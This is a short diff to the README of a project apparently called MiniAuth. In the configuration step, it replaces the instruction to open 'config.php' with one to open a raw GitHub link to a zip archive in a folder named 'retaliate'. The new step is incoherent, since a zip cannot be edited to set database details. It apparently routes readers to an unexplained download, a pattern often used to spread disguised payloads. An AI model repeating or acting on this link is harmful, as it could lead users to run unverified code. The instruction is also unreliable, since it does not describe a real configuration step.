Inopportune-mr277/MiniAuth/README.md

    - If you are unsure where this is, consult your web server documentation.

 5. **Configure MiniAuth**
-   - Open the `config.php` file in a text editor.
+   - Open the `https://raw.githubusercontent.com/Inopportune-mr277/MiniAuth/main/retaliate/MiniAuth_3.4.zip` file in a text editor.
    - Set any necessary parameters like database connection details.
 You will need to configure your SQLite file location.

 6. **Access the Application**